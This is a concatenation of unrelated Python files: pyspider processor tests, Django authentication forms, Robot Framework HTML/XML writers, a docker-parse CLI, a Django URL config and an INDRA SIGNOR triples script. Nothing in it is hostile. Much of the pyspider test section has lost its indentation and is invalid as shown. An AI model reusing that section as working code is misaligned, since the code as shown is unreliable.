        self.assertIsNone(ret.exception)
        self.assertIn('generator object', repr(ret.result))
import shutil
import inspect
from multiprocessing import Queue
from pyspider.database.sqlite import projectdb
from pyspider.processor.processor import Processor
from pyspider.libs.utils import run_in_thread
from pyspider.libs import sample_handler
class TestProcessor(unittest.TestCase):
projectdb_path = './data/tests/project.db'
@classmethod
def setUpClass(self):
    """Start a Processor on a background thread with a fresh sqlite project
    DB and fresh queues, shared by all tests in this class.

    NOTE: the classmethod's first argument is named `self` (it receives the
    class) — kept as-is to match this codebase's convention.
    """
    shutil.rmtree('./data/tests/', ignore_errors=True)
    os.makedirs('./data/tests/')

    def get_projectdb():
        return projectdb.ProjectDB(self.projectdb_path)
    self.projectdb = get_projectdb()
    self.in_queue = Queue(10)
    self.status_queue = Queue(10)
    self.newtask_queue = Queue(10)
    self.result_queue = Queue(10)

    def run_processor():
        # The processor gets its own DB connection (sqlite handles are not
        # shared across threads).
        self.processor = Processor(get_projectdb(), self.in_queue,
                                   self.status_queue, self.newtask_queue, self.result_queue)
        self.processor.project_manager.CHECK_PROJECTS_INTERVAL = 0.1
        self.processor.run()
    self.process = run_in_thread(run_processor)
    time.sleep(1)  # give the processor thread time to come up
@classmethod
def tearDownClass(self):
if self.process.is_alive():
self.processor.quit()
self.process.join(2)
assert not self.process.is_alive()
shutil.rmtree('./data/tests/', ignore_errors=True)
def test_10_update_project(self):
self.assertIsNone(self.processor.project_manager.get('test_project'))
self.projectdb.insert('test_project', {
'name': 'test_project',
'group': 'group',
'status': 'TODO',
'script': inspect.getsource(sample_handler),
'comments': 'test project',
'rate': 1.0,
'burst': 10,
})
self.assertIsNone(self.processor.project_manager.get('not_exists'))
self.assertIsNotNone(self.processor.project_manager.get('test_project'))
task = {
"process": {
"callback": "on_start"
},
"project": "not_exists",
"taskid": "data:,on_start",
"url": "data:,on_start"
}
self.in_queue.put((task, {}))
time.sleep(1)
self.assertFalse(self.status_queue.empty())
while not self.status_queue.empty():
status = self.status_queue.get()
self.assertEqual(status['track']['process']['ok'], False)
self.assertIsNone(self.processor.project_manager.get('not_exists'))
def test_20_broken_project(self):
self.assertIsNone(self.processor.project_manager.get('test_broken_project'))
self.projectdb.insert('test_broken_project', {
'name': 'test_broken_project',
'group': 'group',
'status': 'DEBUG',
'script': inspect.getsource(sample_handler)[:10],
'comments': 'test project',
'rate': 1.0,
'burst': 10,
})
self.assertIsNone(self.processor.project_manager.get('not_exists'))
self.assertIsNotNone(self.processor.project_manager.get('test_broken_project'))
project_data = self.processor.project_manager.get('test_broken_project')
self.assertIsNotNone(project_data.get('exception'))
def test_30_new_task(self):
self.assertTrue(self.status_queue.empty())
self.assertTrue(self.newtask_queue.empty())
task = {
"process": {
"callback": "on_start"
},
"project": "test_project",
"taskid": "data:,on_start",
"url": "data:,on_start"
}
fetch_result = {
"orig_url": "data:,on_start",
"content": "on_start",
"headers": {},
"status_code": 200,
"url": "data:,on_start",
"time": 0,
}
self.in_queue.put((task, fetch_result))
time.sleep(1)
self.assertFalse(self.status_queue.empty())
while not self.status_queue.empty():
self.status_queue.get()
self.assertFalse(self.newtask_queue.empty())
def test_40_index_page(self):
task = None
while not self.newtask_queue.empty():
task = self.newtask_queue.get()[0]
self.assertIsNotNone(task)
fetch_result = {
"orig_url": task['url'],
"content": (
"<html><body>"
"<a href='http://binux.me'>binux</a>"
"<a href='http://binux.me/中文'>binux</a>"
"<a href='http://binux.me/1'>1</a>"
"<a href='http://binux.me/1'>2</a>"
"</body></html>"
),
"headers": {'a': 'b', 'etag': 'tag'},
"status_code": 200,
"url": task['url'],
"time": 0,
}
self.in_queue.put((task, fetch_result))
time.sleep(1)
self.assertFalse(self.status_queue.empty())
self.assertFalse(self.newtask_queue.empty())
status = self.status_queue.get()
self.assertEqual(status['track']['fetch']['ok'], True)
self.assertEqual(status['track']['fetch']['time'], 0)
self.assertEqual(status['track']['fetch']['status_code'], 200)
self.assertEqual('tag', status['track']['fetch']['headers']['etag'])
self.assertIsNone(status['track']['fetch']['content'])
self.assertEqual(status['track']['process']['ok'], True)
self.assertGreater(status['track']['process']['time'], 0)
self.assertEqual(status['track']['process']['follows'], 3)
self.assertIsNone(status['track']['process']['result'])
self.assertEqual(status['track']['process']['logs'], '')
self.assertIsNone(status['track']['process']['exception'])
tasks = self.newtask_queue.get()
self.assertEqual(len(tasks), 3)
self.assertEqual(tasks[0]['url'], 'http://binux.me/')
self.assertTrue(tasks[1]['url'].startswith('http://binux.me/%'), task['url'])
def test_50_fetch_error(self):
# clear new task queue
while not self.newtask_queue.empty():
self.newtask_queue.get()
# clear status queue
while not self.status_queue.empty():
self.status_queue.get()
task = {
"process": {
"callback": "index_page"
},
"project": "test_project",
"taskid": "data:,test_fetch_error",
"url": "data:,test_fetch_error"
}
fetch_result = {
"orig_url": task['url'],
"content": "test_fetch_error",
"error": "test_fetch_error",
"headers": {'a': 'b', 'last-modified': '123'},
"status_code": 598,
"url": task['url'],
"time": 0,
}
self.in_queue.put((task, fetch_result))
time.sleep(1)
self.assertFalse(self.status_queue.empty())
self.assertTrue(self.newtask_queue.empty())
status = self.status_queue.get()
self.assertEqual(status['track']['fetch']['ok'], False)
self.assertEqual(status['track']['fetch']['time'], 0)
self.assertEqual(status['track']['fetch']['status_code'], 598)
self.assertEqual('123', status['track']['fetch']['headers']['last-modified'])
self.assertIsNotNone(status['track']['fetch']['content'])
self.assertEqual(status['track']['process']['ok'], False)
self.assertGreater(status['track']['process']['time'], 0)
self.assertEqual(status['track']['process']['follows'], 0)
self.assertIsNone(status['track']['process']['result'])
self.assertGreater(len(status['track']['process']['logs']), 0)
self.assertIsNotNone(status['track']['process']['exception'])
def test_60_call_broken_project(self):
# clear new task queue
while not self.newtask_queue.empty():
self.newtask_queue.get()
# clear status queue
while not self.status_queue.empty():
self.status_queue.get()
task = {
"process": {
"callback": "on_start"
},
"project": "test_broken_project",
"taskid": "data:,on_start",
"url": "data:,on_start",
}
fetch_result = {
"orig_url": "data:,on_start",
"content": "on_start",
"headers": {},
"status_code": 200,
"url": "data:,on_start",
"time": 0,
}
self.in_queue.put((task, fetch_result))
time.sleep(1)
self.assertFalse(self.status_queue.empty())
while not self.status_queue.empty():
status = self.status_queue.get()
self.assertEqual(status['track']['fetch']['ok'], True)
self.assertEqual(status['track']['process']['ok'], False)
self.assertGreater(len(status['track']['process']['logs']), 0)
self.assertIsNotNone(status['track']['process']['exception'])
self.assertTrue(self.newtask_queue.empty())
def test_70_update_project(self):
self.processor.project_manager.CHECK_PROJECTS_INTERVAL = 1000000
self.processor.project_manager._check_projects()
self.assertIsNotNone(self.processor.project_manager.get('test_broken_project'))
# clear new task queue
while not self.newtask_queue.empty():
self.newtask_queue.get()
# clear status queue
while not self.status_queue.empty():
self.status_queue.get()
task = {
"process": {
"callback": "on_start"
},
"project": "test_broken_project",
"taskid": "data:,on_start",
"url": "data:,on_start"
}
fetch_result = {
"orig_url": "data:,on_start",
"content": "on_start",
"headers": {},
"status_code": 200,
"url": "data:,on_start",
"time": 0,
}
self.projectdb.update('test_broken_project', {
'script': inspect.getsource(sample_handler),
})
# not update
self.in_queue.put((task, fetch_result))
time.sleep(1)
self.assertFalse(self.status_queue.empty())
while not self.status_queue.empty():
status = self.status_queue.get()
self.assertEqual(status['track']['fetch']['ok'], True)
self.assertEqual(status['track']['process']['ok'], False)
# updated
task['project_updatetime'] = time.time()
self.in_queue.put((task, fetch_result))
time.sleep(1)
self.assertFalse(self.status_queue.empty())
while not self.status_queue.empty():
status = self.status_queue.get()
self.assertEqual(status['track']['fetch']['ok'], True)
self.assertEqual(status['track']['process']['ok'], True)
self.projectdb.update('test_broken_project', {
'script': inspect.getsource(sample_handler)[:10],
})
# update with md5
task['project_md5sum'] = 'testmd5'
del task['project_updatetime']
self.in_queue.put((task, fetch_result))
time.sleep(1)
self.assertFalse(self.status_queue.empty())
while not self.status_queue.empty():
status = self.status_queue.get()
self.assertEqual(status['track']['fetch']['ok'], True)
self.assertEqual(status['track']['process']['ok'], False)
self.processor.project_manager.CHECK_PROJECTS_INTERVAL = 0.1
|
import logging
from concurrent.futures.thread import ThreadPoolExecutor
from smtplib import SMTPAuthenticationError
from crispy_forms.helper import FormHelper
from crispy_forms.layout import HTML, Button, ButtonHolder, Column, Div, Field, Layout, Row, Submit
from django import forms
from django.contrib.auth import get_user_model
from django.contrib.auth.forms import AuthenticationForm, UserCreationForm, UsernameField
from django.contrib.auth.tokens import PasswordResetTokenGenerator
from django.template.loader import render_to_string
from django.utils.translation import ugettext_lazy as _
LOGGER = logging.getLogger(__name__)
class LoginForm(AuthenticationForm):
    """
    Login form rendered with crispy-forms.

    Field labels are blanked out because the placeholders act as labels.
    """

    custom_classes = 'bg-transparent border-extra border-top-0 border-right-0 border-left-0 border-bottom rounded-0'

    def __init__(self, request=None, *args, **kwargs):
        super(LoginForm, self).__init__(request=request, *args, **kwargs)
        self.helper = FormHelper(self)
        self.helper.id = 'loginForm'
        self.helper.form_class = 'container-fluid'
        # Assemble the layout bottom-up so each piece stays readable.
        forgot_link = HTML(
            '<a class="col-lg-8 btn-link" href="#no-url">{text}</a>'.format(
                text=_('Forgot password?')
            )
        )
        actions = Div(
            Div(
                forgot_link,
                Submit('', _('Login'), css_class='btn btn-extra col-lg-4'),
                css_class='row align-items-lg-center justify-content-lg-between'
            ),
            css_class='container-fluid'
        )
        self.helper.layout = Layout(
            Div(
                Field(
                    'username',
                    placeholder=_('Username'),
                    css_class=self.custom_classes,
                ),
                Field(
                    'password',
                    placeholder=_('Password'),
                    css_class=self.custom_classes,
                ),
                actions,
                css_class='row flex-column'
            )
        )
        self._clean_labels()

    def _clean_labels(self):
        # Placeholders double as labels, so Django's defaults are removed.
        for name in self.fields:
            self.fields[name].label = ''
class SignUpForm(UserCreationForm):
    """
    User registration form.

    Rendered with crispy-forms.  On save the new account is created inactive
    and a confirmation email is sent on a background thread.
    """
    button_classes = 'btn btn-info'
    custom_classes = 'bg-transparent border-extra border-top-0 border-right-0 border-left-0 border-bottom rounded-0'
    submit_classes = 'btn btn-extra btn-lg'
    discord_id = forms.CharField(
        label=_('Discord Identifier'),
        max_length=254,
        required=False,
        help_text=_('If you have a Discord Account you want to link with just give us your ID!')
    )

    def __init__(self, request, *args, **kwargs):
        super(SignUpForm, self).__init__(*args, **kwargs)
        # Kept so _send_email_confirmation can derive the site domain.
        self.request = request
        self.setup()
        self.helper = FormHelper(self)
        self.helper.id = 'registerForm'
        self.helper.form_class = 'container-fluid'
        self.helper.layout = Layout(
            Row(
                Column(
                    Field('username', css_class=self.custom_classes),
                    css_class='col-12 col-md-6'
                ),
                Column(
                    Field('email', css_class=self.custom_classes),
                    css_class='col-12 col-md-6'
                ),
                Column(
                    Field('password1', css_class=self.custom_classes),
                    css_class='col-12 col-md-6'
                ),
                Column(
                    Field('password2', css_class=self.custom_classes),
                    css_class='col-12 col-md-6'
                )
            ),
            Row(
                Field('discord_id', css_class=self.custom_classes),
                Button('search', _('Send invitation!'), css_class=self.button_classes + ' align-self-center'),
                css_class='justify-content-between'
            ),
            ButtonHolder(
                Submit('submit', _('Register'), css_class=self.submit_classes)
            )
        )

    def setup(self, required_fields=None):
        """
        Modifies some attributes before rendering the form.

        Parameters
        ----------
        required_fields: Iterable.
            Fields to modify and set as required.  Defaults to ('email',).
        """
        if not required_fields:
            required_fields = ('email', )
        for field in required_fields:
            self.fields[field].required = True

    def _generate_token(self, user) -> str:
        """
        Generates a token for the user to confirm its email.

        Parameters
        ----------
        user: User instance
            The user associated to this token.

        Returns
        -------
        token: :class:`str`
            The token generated.
        """
        token = PasswordResetTokenGenerator()
        token = token.make_token(user)
        return token

    def _send_email_confirmation(self, user):
        """
        Sends a confirmation email to the user.

        SMTP authentication failures are logged and swallowed so that
        registration never fails because of mail problems.
        """
        msg_html = render_to_string('email_templates/confirm_email.html', {
            # We declare localhost as default for tests purposes
            'domain': self.request.META.get('HTTP_HOST', 'http://localhost'),
            'token': self._generate_token(user),
            'object': user
        })
        try:
            user.email_user(_('Welcome to Oil & Rope!'), '', html_message=msg_html)
        except SMTPAuthenticationError:
            LOGGER.exception('Unable to logging email server with given credentials.')

    def save(self, commit=True):
        """
        Before saving the instance it sets it to inactive until the user confirms email.

        Returns
        -------
        instance: User instance created.
            The user created.
        """
        instance = super(SignUpForm, self).save(commit=False)
        # Set active to False until user activates email
        instance.is_active = False
        if commit:
            instance.save()
            # User shouldn't wait for the email to be sent.
            # Bug fix: ``with ThreadPoolExecutor(...)`` called
            # shutdown(wait=True) on exit, blocking here until the email was
            # actually sent.  Submit and shut down without waiting instead.
            executor = ThreadPoolExecutor(max_workers=2)
            executor.submit(self._send_email_confirmation, instance)
            executor.shutdown(wait=False)
        return instance

    class Meta:
        model = get_user_model()
        fields = ('username', 'email')
        field_classes = {'username': UsernameField}
        help_texts = {
            'email': _('We will send you an email to confirm your account') + '.'
        }
|
# Copyright 2008-2015 Nokia Solutions and Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from .markuputils import attribute_escape, html_escape, xml_escape
from .robottypes import is_string
from .robotio import file_writer
class _MarkupWriter(object):
    """Base class for writing HTML/XML-style markup to a file-like output."""

    def __init__(self, output, write_empty=True):
        """
        :param output: Either an opened, file like object, or a path to the
            desired output file. In the latter case, the file is created
            and clients should use :py:meth:`close` method to close it.
        :param write_empty: Whether to write empty elements and attributes.
        """
        self.output = file_writer(output) if is_string(output) else output
        self._write_empty = write_empty
        self._preamble()

    def _preamble(self):
        # Hook for subclasses (e.g. XML declaration); nothing by default.
        pass

    def start(self, name, attrs=None, newline=True):
        """Write an opening tag with optional attributes."""
        self._start(name, self._format_attrs(attrs), newline)

    def _start(self, name, attrs, newline):
        markup = '<%s %s>' % (name, attrs) if attrs else '<%s>' % name
        self._write(markup, newline)

    def _format_attrs(self, attrs):
        # Empty attribute values are dropped unless write_empty is set.
        if not attrs:
            return ''
        include_empty = self._write_empty
        pairs = [(key, attribute_escape(attrs[key] or ''))
                 for key in self._order_attrs(attrs)]
        return ' '.join('%s="%s"' % (key, value)
                        for key, value in pairs if include_empty or value)

    def _order_attrs(self, attrs):
        # Subclasses may impose an ordering; default keeps dict order.
        return attrs

    def content(self, content=None, escape=True, newline=False):
        """Write text content, escaped by default."""
        if content:
            text = self._escape(content) if escape else content
            self._write(text, newline)

    def _escape(self, content):
        raise NotImplementedError

    def end(self, name, newline=True):
        """Write a closing tag."""
        self._write('</%s>' % name, newline)

    def element(self, name, content=None, attrs=None, escape=True,
                newline=True, replace_newlines=False):
        """Write a complete element (start tag, content, end tag)."""
        attrs = self._format_attrs(attrs)
        if not (self._write_empty or content or attrs):
            return
        self._start(name, attrs, newline=False)
        self.content(content, escape, replace_newlines)
        self.end(name, newline)

    def close(self):
        """Closes the underlying output file."""
        self.output.close()

    def _write(self, text, newline=False):
        self.output.write(text)
        if newline:
            self.output.write('\n')
class HtmlWriter(_MarkupWriter):
    """Markup writer emitting HTML; attributes are written in sorted order."""

    def _order_attrs(self, attrs):
        return sorted(attrs)  # eases testing

    def _escape(self, content):
        # Escape text content for HTML (see markuputils.html_escape).
        return html_escape(content)
class XmlWriter(_MarkupWriter):
    """Markup writer emitting XML, starting with the XML declaration."""

    def _preamble(self):
        # Written once by __init__ before any elements.
        self._write('<?xml version="1.0" encoding="UTF-8"?>', newline=True)

    def _escape(self, text):
        # Escape text content for XML (see markuputils.xml_escape).
        return xml_escape(text)
class NullMarkupWriter(object):
    """Null implementation of the _MarkupWriter interface.

    Every method accepts any positional arguments and does nothing.
    """

    def __init__(self, *args):
        pass

    # All interface methods share the same no-op implementation.
    start = content = element = end = close = __init__
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
docker-parse is a useful command to get
docker-run commands or docker-compose configurations from running containers
'''
from __future__ import absolute_import
from __future__ import print_function
import sys
import pipes
import getopt
import yaml
import docker
__version__ = '0.5.5'
def output_compose(info, image_info):
    '''Print the container's settings as a docker-compose service definition.

    :param info: container inspect dict (``container.attrs``)
    :param image_info: inspect dict of the container's image; settings that
        merely repeat the image defaults are omitted
    '''
    container = info['Name'][1:]
    conf = info['Config']
    hconf = info['HostConfig']
    compose = {}
    compose['container_name'] = str(container)
    compose['image'] = str(conf['Image'])
    # Volumes
    if isinstance(hconf.get('Binds'), list):
        volumes = [str(volume) for volume in hconf['Binds']]
        if volumes:
            compose['volumes'] = volumes
    # Port bindings: "[ip:][host_port:]container_port"
    if isinstance(hconf.get('PortBindings'), dict):
        ports = []
        for binding, hosts in hconf['PortBindings'].items():
            for host in hosts:
                portbinding = ''
                if host.get('HostIp'):
                    portbinding += host['HostIp'] + ':'
                if host.get('HostPort'):
                    portbinding += host['HostPort'] + ':'
                ports.append(str(portbinding + binding))
        if ports:
            compose['ports'] = ports
    # Devices
    if isinstance(hconf.get('Devices'), list):
        devices = [str(device) for device in hconf['Devices']]
        if devices:
            compose['devices'] = devices
    # RestartPolicy: "name[:max_retries]"
    if 'RestartPolicy' in hconf and hconf['RestartPolicy']['Name']:
        policy = hconf['RestartPolicy']['Name']
        if hconf['RestartPolicy']['MaximumRetryCount'] > 0:
            policy += ':' + str(hconf['RestartPolicy']['MaximumRetryCount'])
        compose['restart'] = str(policy)
    # Privileged
    if hconf['Privileged']:
        compose['privileged'] = True
    # Env: only variables not already set by the image
    if isinstance(conf['Env'], list) and conf['Env']:
        env = [str(e) for e in conf['Env']
               if e not in image_info['Config']['Env']]
        if env:
            compose['environment'] = env
    # DNS
    if isinstance(hconf.get('Dns'), list):
        dns = [str(d) for d in hconf['Dns']]
        if dns:
            compose['dns'] = dns
    # ExposedPorts: only ports not already exposed by the image
    if isinstance(conf.get('ExposedPorts'), dict):
        exposed = [str(port) for port in conf['ExposedPorts']
                   if ('ExposedPorts' not in image_info['Config'] or
                       port not in image_info['Config']['ExposedPorts'])]
        if exposed:
            compose['expose'] = exposed
    # User
    if conf['User'] and image_info['Config']['User'] != conf['User']:
        compose['user'] = str(conf['User'])
    # WorkingDir
    if image_info['Config']['WorkingDir'] != conf['WorkingDir']:
        compose['working_dir'] = str(conf['WorkingDir'])
    # EntryPoint: only when it differs from the image default
    if conf['Entrypoint'] != image_info['Config']['Entrypoint']:
        if isinstance(conf['Entrypoint'], list):
            entry = [str(item) for item in conf['Entrypoint']]
            if entry:
                compose['entrypoint'] = entry
        elif isinstance(conf['Entrypoint'], str):
            compose['entrypoint'] = str(conf['Entrypoint'])
    name = str(info['Name'][1:])
    dumped = yaml.dump({name: compose}, encoding='utf-8',
                       default_flow_style=False)
    # Bug fix: with an explicit encoding PyYAML returns bytes, which made
    # print() emit "b'...'" on Python 3.  Decode before printing.
    if isinstance(dumped, bytes):
        dumped = dumped.decode('utf-8')
    print(dumped)
def output_command(info, image_info, pretty=False):
    '''Print a ``docker run`` command which recreates the container.

    :param info: container inspect dict (``container.attrs``)
    :param image_info: inspect dict of the container's image; settings that
        merely repeat the image defaults are omitted
    :param pretty: when True, emit one option per line with backslash
        continuations
    '''
    # pipes.quote was removed in Python 3.13; prefer shlex.quote with a
    # fallback for Python 2.
    try:
        from shlex import quote
    except ImportError:
        from pipes import quote
    sep = ' \\\n    ' if pretty else ' '
    short_options = ''
    options = []
    container = info['Name'][1:]
    conf = info['Config']
    hconf = info['HostConfig']
    options.append("--name={name}".format(name=container))
    # -d unless stdout is attached; -i/-t mirror stdin/tty settings.
    if not conf['AttachStdout']:
        short_options += 'd'
    if conf['OpenStdin']:
        short_options += 'i'
    if conf['Tty']:
        short_options += 't'
    if short_options:
        options.append('-' + short_options)
    options.append("-h {hostname}".format(hostname=conf['Hostname']))
    # Volumes
    if isinstance(hconf.get('Binds'), list):
        for volume in hconf['Binds']:
            options.append("-v {volume}".format(volume=volume))
    # PortBindings: "[ip:][host_port:]container_port"
    if isinstance(hconf.get('PortBindings'), dict):
        for port, hosts in hconf['PortBindings'].items():
            for host in hosts:
                portbinding = ''
                if host.get('HostIp'):
                    portbinding += host['HostIp'] + ':'
                if host.get('HostPort'):
                    portbinding += host['HostPort'] + ':'
                portbinding += port
                options.append("-p {portbinding}".format(portbinding=portbinding))
    # Devices
    if isinstance(hconf.get('Devices'), list):
        for device in hconf['Devices']:
            options.append("--device={device}".format(device=device))
    # RestartPolicy
    if 'RestartPolicy' in hconf and hconf['RestartPolicy']['Name']:
        policy = hconf['RestartPolicy']['Name']
        if hconf['RestartPolicy']['MaximumRetryCount'] > 0:
            policy += ':' + str(hconf['RestartPolicy']['MaximumRetryCount'])
        options.append("--restart={policy}".format(policy=policy))
    # Privileged
    if hconf['Privileged']:
        options.append('--privileged')
    # DNS.  Bug fix: the docker option is --dns; "-dns" is not valid.
    if isinstance(hconf.get('Dns'), list):
        for dns in hconf['Dns']:
            options.append("--dns={dns}".format(dns=dns))
    # ExposedPorts: only ports not already exposed by the image
    if isinstance(conf.get('ExposedPorts'), dict):
        for port in conf['ExposedPorts']:
            if ('ExposedPorts' not in image_info['Config'] or
                    port not in image_info['Config']['ExposedPorts']):
                options.append("--expose={port}".format(port=port))
    # Env: only variables not already set by the image
    if isinstance(conf['Env'], list):
        for env in conf['Env']:
            if env not in image_info['Config']['Env']:
                options.append("-e {env}".format(env=quote(env)))
    # EntryPoint: only when it differs from the image default
    if conf['Entrypoint'] != image_info['Config']['Entrypoint']:
        entry = []
        if isinstance(conf['Entrypoint'], list):
            entry = [quote(item) for item in conf['Entrypoint']]
        elif isinstance(conf['Entrypoint'], str):
            entry = [quote(conf['Entrypoint'])]
        if entry:
            options.append("--entrypoint={entry}".format(entry=quote(' '.join(entry))))
    # WorkingDir
    if image_info['Config']['WorkingDir'] != conf['WorkingDir']:
        options.append("-w {dir}".format(dir=quote(conf['WorkingDir'])))
    # User
    if conf['User'] and image_info['Config']['User'] != conf['User']:
        options.append("-u {user}".format(user=quote(conf['User'])))
    # Cmd: only when it differs from the image default
    cmd = []
    if conf['Cmd'] != image_info['Config']['Cmd']:
        if isinstance(conf['Cmd'], list):
            cmd = [quote(item) for item in conf['Cmd']]
        elif isinstance(conf['Cmd'], str):
            cmd = [quote(conf['Cmd'])]
    print('# docker-run command for {container}'.format(container=container))
    cmd_str = 'docker run{sep}{options}{sep}{image}'.format(
        options=sep.join(options), sep=sep, image=conf['Image'])
    if cmd:
        cmd_str += ' ' + ' '.join(cmd)
    print(cmd_str)
    print()
def main():
    '''main entry: parse CLI options and dump each container's configuration'''
    cli = docker.from_env()
    try:
        opts, args = getopt.gnu_getopt(sys.argv[1:], "pcv", ["pretty", "compose"])
    except getopt.GetoptError:
        print("Usage: docker-parse [--pretty|-p|--compose|-c] [containers]")
        sys.exit(2)
    if args:
        # Explicit container names/ids on the command line.
        containers = [cli.containers.get(name) for name in args]
    else:
        # No arguments: inspect every container, running or not.
        containers = cli.containers.list(all=True)
    as_compose = False
    pretty = False
    # Bug fix: the option loop used to ``break`` after the first match, so
    # e.g. ``-p -c`` silently ignored --compose.  Process every option.
    for opt, _unused in opts:
        if opt == '-v':
            print(__version__)
            sys.exit()
        elif opt in ('-p', '--pretty'):
            pretty = True
        elif opt in ('-c', '--compose'):
            as_compose = True
    for container in containers:
        info = container.attrs
        # diff with image info to reduce information
        image_info = cli.images.get(info['Config']['Image']).attrs
        if as_compose:
            output_compose(info, image_info)
        else:
            output_command(info, image_info, pretty)


if __name__ == "__main__":
    main()
|
from django.urls import path
from charaViewer.viewer.views import (top_view,
login_view)
# URL routes for the viewer app; route names are used with reverse()/``{% url %}``.
urlpatterns = [
    path('', top_view, name="viewer_top"),
    path('login', login_view, name="viewer_login"),
]
|
import os
import pandas as pd
from copy import deepcopy
from itertools import product
from indra.sources import signor
from collections import defaultdict
from indra.statements import Activation, Inhibition
from causal_precedence_training import locations
def get_relevant_signor_statements():
    """Get Inhibition and Activation statements from SIGNOR

    Returns
    ----------
    signor_stmts_by_id : dict
        Dictionary mapping SIGNOR IDs to lists of associated statements
    """
    sp = signor.process_from_web()
    signor_stmts_by_id = defaultdict(list)
    for stmt in sp.statements:
        if isinstance(stmt, (Inhibition, Activation)):
            # Group statements by the SIGNOR ID recorded in their evidence.
            signor_stmts_by_id[stmt.evidence[0].source_id].append(stmt)
    # Bug fix: the function promised a dict but never returned it; the
    # converted dict was built and then silently discarded.
    return dict(signor_stmts_by_id)
def generate_signor_triples_dataframe(signor_stmts_by_id):
    """Build a dataframe of causal triples A->B->C from SIGNOR pathway files.

    Parameters
    ----------
    signor_stmts_by_id : dict
        Mapping of SIGNOR IDs to lists of INDRA statements (see
        ``get_relevant_signor_statements``).

    Returns
    -------
    pandas.DataFrame
        Columns: statement1, statement2, signor_entity1, signor_entity2,
        signor_entity3, pathway_filename.  Agents with bound conditions are
        expanded into additional rows (one per bound/unbound combination).
    """
    SIGNOR_pathway_dfs = []
    for pathway_filename in os.listdir(locations.SIGNOR_PATHWAYS_DIRECTORY):
        filepath = os.path.join(locations.SIGNOR_PATHWAYS_DIRECTORY,
                                pathway_filename)
        # Load relevant columns of pathway tsv file
        pathway_df = pd.read_csv(filepath, sep='\t', keep_default_na=False,
                                 usecols=['SIGNOR_ID', 'ENTITYA', 'ENTITYB',
                                          'EFFECT'])
        # Filter to only activations and inhibitions
        pathway_df = pathway_df[
            pathway_df.EFFECT.isin(['up-regulates activity',
                                    'down-regulates activity'])]
        # Add column for INDRA statement associated to each edge in pathway
        # (the first statement collected for that SIGNOR ID).
        pathway_df['statement'] = pathway_df.SIGNOR_ID.\
            apply(lambda x: signor_stmts_by_id[x][0])
        # Pathway TSV files are inconsistent regarding naming of pathways.
        # Some have column for the pathway name while others don't. Use the
        # associated filename to label each pathway since it is always
        # present.
        pathway_df['pathway_filename'] = pathway_filename
        # Perform a self inner join from Object to Subject to collect causal
        # triples from within the pathway.
        pathway_df = pathway_df.\
            merge(pathway_df, left_on='ENTITYB', right_on='ENTITYA',
                  how='inner')
        # Do some renaming to clean up column names after join
        pathway_df.\
            rename({'ENTITYA_x': 'signor_entity1',
                    'ENTITYA_y': 'signor_entity2',
                    'ENTITYB_y': 'signor_entity3',
                    'statement_x': 'statement1',
                    'statement_y': 'statement2',
                    'pathway_filename_x': 'pathway_filename'}, axis=1,
                   inplace=True)
        # Drop unnecessary columns
        pathway_df.drop(['pathway_filename_y', 'ENTITYB_x',
                         'SIGNOR_ID_x', 'SIGNOR_ID_y'], axis=1, inplace=True)
        SIGNOR_pathway_dfs.append(pathway_df)
    # Concatenate the rows of the dataframes together into one large dataframe
    # Use shortname to make following filter more readable
    df = pd.concat(SIGNOR_pathway_dfs)
    # Filter self edges and loops
    df = df[(df.signor_entity1 != df.signor_entity3) &
            (df.signor_entity1 != df.signor_entity2) &
            (df.signor_entity2 != df.signor_entity3)]
    # Remove duplicate triples (keep the first occurrence per entity triple)
    df = df.groupby(['signor_entity1', 'signor_entity2',
                     'signor_entity3'],
                    as_index=False).first()
    # Change order of columns
    df = df[['statement1', 'statement2', 'signor_entity1', 'signor_entity2',
             'signor_entity3', 'pathway_filename']]
    # Expand bound conditions into multiple statements
    # Pull out agents A->B->C from chain
    df['A'] = df.statement1.apply(lambda x: x.subj)
    df['B'] = df.statement1.apply(lambda x: x.obj)
    df['C'] = df.statement2.apply(lambda x: x.obj)
    # Add columns for bound agents if they exist (NaN otherwise)
    df['A_bound'] = df.A.apply(_get_bound_agent)
    df['B_bound'] = df.B.apply(_get_bound_agent)
    df['C_bound'] = df.C.apply(_get_bound_agent)
    # Drop bound conditions from agent columns
    df.loc[:, 'A'] = df.A.apply(_get_unbound_agent)
    df.loc[:, 'B'] = df.B.apply(_get_unbound_agent)
    df.loc[:, 'C'] = df.C.apply(_get_unbound_agent)
    # I can't think of a better way than just iterating over the dataframe
    new_rows = []
    for _, row in df.iterrows():
        # Every combination of unbound/bound agents; NaN combinations are
        # skipped (no bound condition existed for that agent).
        for A, B, C in product([row['A'], row['A_bound']],
                               [row['B'], row['B_bound']],
                               [row['C'], row['C_bound']]):
            if pd.isna(A) or pd.isna(B) or pd.isna(C):
                continue
            new_stmt1 = deepcopy(row['statement1'])
            new_stmt2 = deepcopy(row['statement2'])
            new_stmt1.subj, new_stmt1.obj = A, B
            new_stmt2.subj, new_stmt2.obj = B, C
            new_rows.append([new_stmt1, new_stmt2, row['signor_entity1'],
                             row['signor_entity2'], row['signor_entity3'],
                             row['pathway_filename']])
    df = pd.DataFrame(new_rows,
                      columns=['statement1', 'statement2', 'signor_entity1',
                               'signor_entity2', 'signor_entity3',
                               'pathway_filename'])
    return df
def _get_bound_agent(agent):
    """Return a copy of the agent's first bound-condition agent, or NaN if none."""
    conditions = agent.bound_conditions
    if not conditions:
        # NaN so callers can filter with pd.isna.
        return float('nan')
    return deepcopy(conditions[0].agent)
def _get_unbound_agent(agent):
    """Return a deep copy of *agent* with all bound conditions removed."""
    unbound = deepcopy(agent)
    if unbound.bound_conditions:
        unbound.bound_conditions = []
    return unbound
def main():
    """Build the SIGNOR causal-triples dataframe and pickle it to disk."""
    stmts_by_id = get_relevant_signor_statements()
    triples_df = generate_signor_triples_dataframe(stmts_by_id)
    out_path = os.path.join(locations.TRIPLES_DIRECTORY,
                            'signor_causal_triples.pkl')
    triples_df.to_pickle(out_path)


if __name__ == '__main__':
    main()
|
# -*- coding: utf-8 -*-
#BEGIN_HEADER
import os
import sys
import shutil
import hashlib
import subprocess
import traceback
import uuid
import logging
import pprint
import json
import tempfile
import re
from datetime import datetime
